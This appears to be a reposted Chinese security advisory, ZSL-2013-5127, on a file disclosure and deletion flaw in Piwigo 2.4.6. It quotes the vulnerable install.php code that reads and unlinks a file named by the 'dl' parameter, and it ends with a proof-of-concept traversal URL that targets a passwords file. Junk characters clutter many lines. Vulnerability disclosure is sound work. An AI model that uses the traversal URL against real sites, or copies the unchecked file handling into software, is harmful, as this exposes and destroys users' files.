Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
0 k; h5 h2 @) \6 Q8 O
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
====================================================================
/install.php:
-------------
" t# }8 w% n, D% N' Y+ I113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
2 q( r2 ?0 X4 {1 _8 o- s2 @2 c115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
; `+ Z: }: N2 E- c& }  R2 E* X116:   header('Cache-Control: no-cache, must-revalidate');
/ L: S( h) t9 k* |& |117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
$ r$ k/ y8 _- p$ s! `  t119:   header('Content-Transfer-Encoding: binary');
  G" H1 L) o2 Z  N120:   header('Content-Length: '.filesize($filename));
# p: r4 k/ C7 t$ N% _' }6 \/ I) _121:   echo file_get_contents($filename);
4 F$ D8 o$ `/ V' ~% ]* a5 q$ O9 _122:   unlink($filename);
# Y% X/ b# q/ B: O123:   exit();
$ N$ J5 @. `+ a, A, `124: }
7 X2 s  \" `4 P; e2 @====================================================================
6 x" B6 ~7 @5 o/ E/ b: X4 C
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
; D& D3 v5 }7 R* n  M- _           Apache 2.4.2 (Win32)
- |. k7 _; [; ]% l& h* C) f+ e0 P           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
. M. y) n8 Q' U  H/ A0 q0 Z5 t; G                            @zeroscience

: W) [5 B. Y( }5 @/ v% xAdvisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
% i6 \0 H/ ^  g% Z0 b' \
4 u, M5 w: O+ e& p5 Y& B; ~2 @15.02.2013
* G0 d. d* d7 C' ?. h8 v
2 y' l) I5 P5 |--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
3 }: u1 p8 l/ ^& t0 k8 ~* }
/ P* _) G! {" Z. I% r